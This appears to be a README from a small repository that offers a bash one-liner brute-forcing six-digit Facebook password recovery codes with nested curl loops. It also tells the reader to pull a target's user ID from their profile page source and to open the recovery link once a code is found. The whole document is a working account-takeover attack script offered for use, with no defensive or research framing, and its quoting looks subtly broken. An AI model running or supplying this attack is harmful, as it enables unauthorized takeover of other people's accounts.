e2002e/fbrc/README.md

 `for i in {0..9}; do for j in {0..9}; do for k in {0..9}; do for l in {0..9}; do for m in {0..9}; do for n in {0..9}; do curl 'https://www.facebook.com/recover/password/?u=&n=$i$j$k$l$m$n |grep password_new; done; done; done; done; done; done`

 You must pass the user_id to the `u`parameter, you will find this id in the souce code of the page on the wall of the user, just search for USER_ID.

+This curl script is the simplest and will output something only when the code is found, you'll find the code somewhere in the console, just go to the recovery link using the ID and code in a browser.